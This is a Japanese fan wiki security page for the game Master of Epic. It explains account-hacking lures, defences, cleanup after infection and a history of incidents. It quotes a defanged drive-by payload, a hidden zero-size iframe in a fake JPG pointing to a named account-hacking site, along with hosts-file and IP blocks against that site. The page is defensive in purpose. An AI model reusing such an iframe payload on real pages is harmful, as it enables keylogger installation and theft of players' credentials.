安全のために

安全のために †

海外（特に中国）からのアカウントハックに要注意！
MoE以外のネットゲームでも被害が起きているようです（参考）。
該当者は公式サイトのサポート窓口へ問い合わせてみましょう。
パスワードの使い回しは絶対にやめ、パスワード自体も定期的に変更するようにしましょう。

- 重要なお知らせ -
不正アクセスの被害に遭われているアカウントの特徴といたしまして、
「 パスワードを長い間変更していないアカウント 」や、
「 推測されやすいパスワードを設定しているアカウント 」が確認されております。

第三者にわかりやすいパスワードは非常に危険ですので、
推測されやすいパスワードは設定しない事を強くお勧めいたします。

==============================================================================
【推測されやすいパスワードの例】
　 ・aaaa00000　など同じ文字、数字が連続するパスワード
　 ・qwer67890　などキーボードの文字配列に近い英数字を順番に並べたパスワード
　 ・moe01　などゲーム名や商品名、単語などよく知られている言葉を使ったパスワード
　 ・ゲームIDの後半に数字を追加したパスワード
==============================================================================

==============================================================================
パスワードを定期的に変更していない場合や、
他のサービスと同様のパスワードを使用している場合、
この機会に変更する事を強くお勧めいたします。

こまめなパスワード変更はアカウントハック対策にとって非常に効果的です。
また、他のサービスで同じゲームIDとパスワードの組み合わせを使用している場合には、
『 Master of Epic 』独自のパスワードにご変更いただけますようお願いいたします。
==============================================================================

「 Master of Epic 」運営チームでは、
不正アクセスと疑われる接続を確認した場合、
お客様へのご連絡を待たずに、調査のため
ゲームIDを一時停止させていただく場合がございます。

お客様にはご不便をお掛けいたしますが、
正常にゲームIDとパスワードを入力してもゲームにログインできない場合には、
下記お問合わせフォームをご記載いただき
サポート窓口までご連絡いただきますようお願いいたします。

ご連絡いただきましたアカウントにつきましては、
順次、調査を行い、安全が確認された時点で運営チームにてパスワードを変更後、
一時停止の解除を行わせてただいております。

新着情報 †

• 公式ニュース 14-06-10 セキュリティ強化キャンペーン
  
  • パスワード変更を促進するためのキャンペーン
• 公式ニュース 14-04-22 セキュリティ強化キャンペーン開始
  • パスワード変更を促進するためのキャンペーン
• 公式ニュース 13-06-08 文字認証強化のお知らせ
  • ひらがなに加え、英数字にも対応
• 公式ニュース 13-05-15 【重要】不正アクセスによるアカウント停止について【5/21更新】
• 公式ニュース 13-05-13 【重要】アカウントハッキングによるアカウント一時停止について
• 公式ニュース 13-05-06 【重要】ゲームID・メールアドレスの管理に関するご案内
• 公式ニュース 12-12-25 「 セキュリティ強化キャンペーン 」開始のお知らせ
  • パスワード変更を促進するためのキャンペーン
• 12-05-22「キャラクター認証」導入のお知らせ
  
  • ログイン時に【 最後にゲームへログインした 】キャラクター名の入力が必要
• 12-05-18 「 セキュリティ強化キャンペーン 」開始のお知らせ
  
  • パスワード変更を促進するためのキャンペーン
• 12-04-22 臨時メンテナンス終了のお知らせ
  
  • 公式サイトへのログイン時に文字認証が必要
• 12-03-26 【重要】お客様へ、パスワード変更のお願い
  
• 10-06-15 公式サイトのログインロックシステム導入のお知らせ
  
  • 公式サイトへのログイン時に5回以上、連続してパスワードの入力に失敗した場合、 アカウントがロックされるシステムが導入
• 10-05-02 RMT・アカウントハックに対する取り組みについて
  

何が起こっているのか？ †

2006年10月頃から、海外（特に中国）からオンラインゲームを狙ったアカウントハックが多発しています。
その多くはRMT（現金取引）の業者といわれています。
アップローダに当時（2006/10）上げられた中国のHTML偽装jpgですが

ドメイン情報　www■zhangweijp■com 61.139.126.10
country: CN
CHINANET Sichuan province network (シナ四川省)
61.139.0.0 - 61.139.127.255

あきらかにROで各種サイトにリンクを貼り付けてアカウントハックの被害を出しまくった 中国人アカウントハック集団のサイトです。(www■zhangweijp■comでググるわかる)

またリネージュでも被害が確認されている老舗(?)アカウントハックサイトです
tmsn.exeという実行ファイルを強制DLさせられるので注意

これ以外にも様々なものがあります。上記URL以外にも十分気を付けましょう
RagnarokOnlineやリネージュなどが被害の中心でしたが、その範囲はどんどん広まっています。
Master of Epicも例外ではなく、実際に罠を仕掛けられたことがあります（後述）。

どんな手を使っているのか？ †

2007年3月段階で確認されているものをあげておきます。時間の経過に伴い新しい手段が出てくると思われます。
大まかな手口としては、

1. 偽装やその他の手段で悪意のあるプログラムを設置してあるサイトへ誘導する
2. セキュリティの穴をついて悪意のあるプログラムを仕掛ける
3. 悪意のあるプログラムがPC内の情報を、どこかに送信する といったことが行われます。

• jpg偽装型
  • アップローダーなどにjpg画像ファイルに偽装をし、アカウントハックサイトに飛ばす罠を仕込む
  • コメントに「Dツアーおつかれさま」などと書き込み、警戒を解かせ踏む様に仕掛けています
  • InternetExplorerやIEコンポーネントのブラウザで踏むとキーロガー等を仕込まれます。
  • 中身は下記のようなものが一例

    <html>
    <iframe src="http://www■zhangweijp■com/tt2/index■htm" width="0" height="0" frameborder="0"></iframe>
    <center><img src="http://www■zhangweijp■com/jpg/001■jpg"></center>
    </html>
    （上記は元ソースから.（ドット）を■に置き換えてある）

  • 罠jpgのURLを2chの掲示板などに貼り付けたりということもある
• Wiki編集型
  • Wikiの編集しやすさを逆手に取り、リンクをアカウントハックサイトに書き換える
  • このWikiでは外部へのリンクに記号がつきます
    • 参考：https://moepic.com/ ←一番右にあるマークが外部リンクの印（JavaScriptが無効だと出ません）
  • 外部リンクの際には飛ぶ先が本当に正しいか注意してください
• Blogコメント型
  • 個人の運営するBlogに、興味を持つようなコメントを付けることでURLへと誘導する手口。
  • 例えば、「Blog移転しました、今度からはこっちをブックマークお願いします」など。
• ネットカフェ仕込み型
  • 不特定多数の人が使うネットカフェにキーロガーなどを仕込む方法
• ゲーム内URL表記型
  • 募集チャンネルなどに鍵付きでURLのみを記載、疑問に思ったプレイヤーをアクセスさせる
• フリーメール経由型
  • ブラウザベースのフリーメールアカウントが流出すると、そこからゲームのアカウント情報などを収集され、アカウントハックされるケースがあります。
  • 2009年10月に起きたHotmailアカウントの流出以後、この手口によるものと思われる被害が増加しています。

何をすればいいの？ †

以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』（http://www.higaitaisaku.com/korobanu.html）が参考になるでしょう。

• 基本
  • 定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ等)のアップデート
  • 安易なパスワードを使わないこと及び、より強力なパスワードの使用
  • 定期的なパスワードの変更
    • ゲームアカウントだけでなく、登録メールアドレスのアカウントパスワードも変更しましょう。
  • アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新
  • パーソナルファイアーウォールソフトの導入
  • アドレスをホイホイ踏まない。よく確認する。「ソースチェッカーオンライン」などのブラクラチェックサイトを利用する。
  • 出所の怪しいプログラムやスクリプトを実行しない
  • アカウント関連のメールをサーバに残さない（手元にダウンロードしたらサーバからは削除する）

• 応用
  • IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
  • IEコンポーネント使用のブラウザを使う (セキュリティ設定が容易な物が多い)
  • 信頼できるSite以外ではスクリプトやActiveXを切る
    • インターネットオプションのセキュリティの部分で設定可能
  • 偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
    • インターネットオプション→セキュリティ→レベルのカスタマイズ→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

何をすればいいの？もっと詳しく †

• 接続禁止IPレンジの設定
  • セキュリティソフト等で61.139.0.0 - 61.139.127.255を接続禁止IPレンジとして登録しておきましょう。万が一踏んだとしても接続拒否しておけば被害を防止できます
  • ファイアウォールソフトごとに設定の可否、またその方法も違うようです

• hosts編集 (接続拒否設定)
  
  • hostsが何かについてはこちら参照
  • Windows XP、Windows Server 2003 の場合 : c:\windows\system32\drivers\etc\hosts
  • Windows 2000 の場合 : c:\winnt\system32\drivers\etc\hosts
  • 編集はtxt editorで行えます
  • 編集後は上書き禁止にすること

    # Copyright (c) 1993-1999 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      102.54.94.97     rhino.acme.com          # source server
    #       38.25.63.10     x.acme.com              # x client host
    
    127.0.0.1       localhost
    0.0.0.0 61.139.126.10

• #の行はコメントなのでなくてもよいです
• hosts編集の意味について
  　例）　0.0.0.0 [tab] www.yahoo.com
  　このようにすると、www.yahoo.com を開こうとしても強制的に 0.0.0.0 にアドレスが置換されるため、ヤフーにつなげることが出来なくなります。
  　このため、0.0.0.0の部分には存在しないアドレスを記入するのが通例です。
  　開きたくないアドレスなどがあれば、各自で変えておきましょう。
  

PCにウィルス対策ソフトを導入してない方へ †

※一種類で安心しないように

• avast!アンチウイルス　有料版と無料版があり、どちらも60日目以降はどちらもユーザー登録（＋有料版は料金の支払い）が必要
  • http://www.avast.com/index_jpn.html
• ZoneAlarm（ファイヤーウォールソフト　基本機能だけの無料版アリ）オンラインスパイウェアスキャンも。
  • http://www.zonealarm.com/store/content/company/products/znalm/freeDownload.jsp?dc=34std&ctry=EU&lang=en
• トレンドマイクロ　ウイルスバスターオンラインスキャン
  • http://www.trendmicro.co.jp/hcall/index.asp
• Ad-Aware SE　スパイウェア対策ソフト　有料の「Professional」「Plus」と無料の「Personal」がある。
  • http://www.lavasoft.com/products/ad-aware_se_personal.php
• Spybot　無料のスパイウェア対策ソフト
  • http://enchanting.cside.com/security/spybot1.html
• Kaspersky Anti-Virus (体験版)　オンライン ウイルス＆スパイウェアスキャナもあり
  • http://www.kaspersky.co.jp/
• NOD32 アンチウイルス (体験版)
  • http://www.canon-sol.jp/product/nd/trial.html

2chのネトゲ実況3のスレにこれらのアドレス（アップローダーのjpgや、アカウントハックサイトそのもの等）のURLが貼られる事が稀に出始めています。 また、このページと同じように警戒を呼びかける文章で、ウイルス対策ソフトや対策ページのURLがアカウントハックサイトのものに変えられている事もあります。 十分に気を付けましょう。

アカウントハックされても基本的に自己責任となり、また、失ったアイテムやアカウントを復元する事は不可能です。 自分の身は自分で守りましょう。

怪しいファイルを踏んでしまったときには †

感染したと思ったら？ †

1. まずは落ち着きましょう
   • 冷静に対処を行う必要があります
   • どういう状況で感染したか(したと思ったのか)をキチンと把握(若しくはメモ)して下さい。再発防止・原因究明に役立ちます
2. LANケーブル/電話線を引っこ抜きましょう
   • 既にID&Passを送信されていなければ、単純ですが最も効果の有る処置です(参考)
   • ケーブルを繋いだ状態、若しくは加えてMoEを起動したり公式をブラウザで開いたりは絶対に行ってはいけません。ID/Passwordが漏洩する恐れがあります
3. 安全と思われるPCより公式にアクセス、Passwordを変更する
   • ウイルス感染中のPCを決して使用してはいけません。
   • 他にPCを所持してない場合は、下の『注意』の項を参照の事
4. システムの復元オプションを無効にする (Windows Me/XP)
   • 何とかシステムを復旧させてもバックアップから復活されては意味が有りません
   • WindowsMEの方法 と WindowsXPの方法 を参考にして下さい (シマンテックSiteより)
   • WindowsFAQも参考になるでしょう
   • 完全復旧後はこれと逆の操作を行い、復旧オプションを有効化させましょう
5. アンチウイルスソフトとスパイウェア検出ソフトでPCをチェックする
   • 必須です。出来るだけ最新の定義ファイルである事が望ましいです *1
   • アンチウイルスソフト等が入ってない場合は、速攻買ってくるか安全と思われる別のPC経由で手に入れるべきです *2
   • オンラインスキャンという手も有りますが、Networkに繋がっているという事は危機*3に晒されているのと同義であり、全くお勧め出来ません
   • アンチウイルスソフトの探知から逃れるべくウイルスは日々改造されています。よって仮に検出されなくても100%安心できるとは言えません
   • 上手く削除できない場合はセーフモードやコマンドプロンプトオンリーのモードで起動して対処する事も考慮に入れて下さい (Win98/Meの場合はPC起動時にctrlキーを、WIn95/2k/XPの場合はF8キーを押しつづければOK)
6. それでも不安なら…
   • PCの再セットアップ(OSのクリーンインストール)を行いましょう。セキュリティパッチ等のアップデートは必須です
   • アカウントハック関連のウイルスは感染性が弱めなので、感染に対して多少の注意をしながら行えば大体消えてくれます
7. 公的機関への届け出
   • 実際に被害があった場合は正真正銘の犯罪ですので警察への届出は重要です
   • 警察庁サイバー犯罪対策あたりから窓口を探しましょう*4
   • また、独立行政法人 情報処理推進機構 セキュリティセンター(IPA/ISEC)への届出も重要です。
     統計データ上、オンラインゲーム関連の被害が増えている事が明白となれば、研究課題として取り挙げられる可能性も高くなります。
   • IPA/ISEC 情報セキュリティに関する届出について
8. 公式サポート窓口へ報告を行う
   • あまり期待は出来ませんが、やっておくに越した事は無いです

• 注意
  • 基本は 感染PCのNetworkからの隔離 と 迅速な処置 です
  • 安全と思われるPCが無い場合は各自のスキルに依存します。以下の選択枝を考慮してください
    1. 手動/ソフトによるウイルス削除を頑張って行う (その後にPassword変更)
    2. PCの再セットアップを頑張って行う (その後にPassword変更)
    3. 友人のPCやネットカフェ利用
    4. 1CD Linuxの利用 (Wikipedia：1CD Linux)。
  • 清浄化を確認するまでMoE関連のプログラムやSiteに近寄らずにお掃除作業を行えばウイルスの悪影響から回避出来るかもしれませんが（多くはキーロガーやメモリサーチタイプと推測されるので、ID&Passを打たなければ良いかもしれない）、安全な橋とは言い難いのを付け加えておきます

どう考えてもトロイっぽいのが動いているかどうか、まずはプロセスマネージャで確認

• マカフィーのサイト よくある質問: タスクマネージャを利用して実行中のプロセスを停止させる方法
  • http://www.mcafee.com/japan/mcafee/support/faq/answer_f_alert.asp?wk=AR-00008
• Windowsの「タスクマネージャ」を便利に使う3つのTips
  • http://www.itmedia.co.jp/bizid/articles/0703/06/news050.html
• プロセス? :マルチタスクOS環境におけるプログラムの実行単位。
  • http://www.atmarkit.co.jp/icd/root/78/5787378.html
• Windowsのスタートアップやタスクマネージャに現れるプロセス、実行ファイルのリスト
  • http://cowscorpion.com/tasklist/index.html
    • プロセスの名前と内容がよく判らない時はここで。通常存在しないプロセスを発見したらググル前にここで調べる事。問題のないプロセスを勘違いして殺さないように。
• ベクター :プロセス関係のソフトウェアDLサービス
  • http://www.vector.co.jp/vpack/filearea/win/util/task/

• 怪しい常駐プログラムを動作させなくする方法
  • スタート→「ファイル名を指定して実行」→ 名前(O): のところへ　msconfig　と入れ OK
  • システム構成ユーティリティが起動するので一番左のタブ「スタートアップ」を選択
  • スタートアップ項目、コマンドを確認して その壱で見つけたトロイ実行プロセス(exe)が無いか確認する。
  • 存在する場合はその部分のスタートアップ項目からチェックを外す
  • ちなみに"コマンド"部分にはその実行ファイル(exe)が存在する場所が書かれているので そのフォルダを開いて後で削除できるように覚えておく事※1
  • OKを押すと「システム構成の変更を有効にするには、再起動する必要があります」と表示される
  • ブラウザなどの実行されているプログラムを全て閉じてから再起動(R)を押す。
  • 念のために再起動する前にネット接続を物理的に遮断しておくとより安全。
  • 再起動したらもう一度プロセスマネージャからトロイが実行されていないか確認する。
  • プロセスマネージャに存在していなければ※1で調べておいたフォルダを開く
  • 該当する実行ファイル(exe)を削除もしくは拡張子をexeからbakなどに変更して実行できなくする。
  • 万が一、間違っていた場合に備えて拡張子を変更するだけにしておけば復元も出来る

アカウントハック以外の「安全のために」 †

上記のように直接アカウントへのアクセスを試みる業者の他に、単純な宣伝や愉快犯的な存在もあります。
これらはアカウントハックを行うことを主な目的としないと思われるため、IDやPASSを盗み出す可能性は低いと考えられます（全くないわけではないが）。
次のようなことが行われているようです。

• アダルトサイトやRMTサイトなどへの誘導
• ブラウザクラッシャーへの誘導

直接的な被害は大きくありませんが、怪しいURLは開かない事にこしたことはありません。
怪しいと思ったときには
　aguse.jp　http://www.aguse.jp/
こういったところで、サーバーなどの情報を調べるのがよいでしょう。

謝辞 †

このページを書くにあたり非常に参考にさせていただきました*5
参考： http://smith.rowiki.jp/?Security

どうもありがとうございます。

MoE関連の事件履歴 †

• 2006年10月
  • アップローダーに「Dツアーおつかれさま」というコメントともに偽装JPG（踏むとキーロガーを仕込まれる）が投稿される。
• 2007年5月
  • ゲーム内募集チャンネルで鍵付きでURLのみ書かれたチャンネルがたてられる。
• 2007年7月
  • このWikiのメニューバーほとんど全域にわたって日本語アダルトサイト行きリンクに書き換えられる。
• 2007年8月30日
  • このWikiのメニューバーの数カ所がウィルス「VBS/Psyme」（キーロガーと思われます）の仕込まれているサイトへのリンクに書き換えられる。
• 2007年9月中旬〜10月10日
  • 作りたてと思われる旅人キャラが課金アイテムを相場より格安で大量に販売する露店が目撃される
  • 2007年10月10日、クレジットカードの不正利用があったと公式アナウンスが出る。
  • そのアナウンスによると、公式はこの件に関し当該アカウント・関連アカウントに対し128件+追加で37件の計165件の停止措置、および調査を行ったということであった
  • 07-10-10 クレジットカードの不正利用者に対する取り組みについて
  • 07-10-11 クレジットカードの不正利用者に対する取り組みについて・補足
• 2007年10月21日
  • Topページのリンクが海外の正体不明のサイトへのリンクへとすべて書き換えられる。
• 2007年12月4日
  • クレジットカードの不正利用およびゲーム内の不正利用者への取締り強化の一環として海外からの接続を制限する試みが始まる。不具合のため一時的に解除されたが、11日に再開された。
• 2007年12月7日
  • 日本語（利用規約を完全に理解できる日本語力）でのコミュニケーションを基本とし、日本語で対話入力ができないユーザーには適切な手順をおってアカウントに対する措置をするという方針が発表される。
• 2007年12月15日
  • アップローダーにjpgに偽装したトロイが大量にアップロードされる。情報の送り先は中国。
• 2007年12月20日
  • アップローダーにjpgに偽装したトロイが大量にアップロードされる。情報の送り先は中国。

コメント †

わからないことは外部掲示板の該当スレなどで聞きましょう。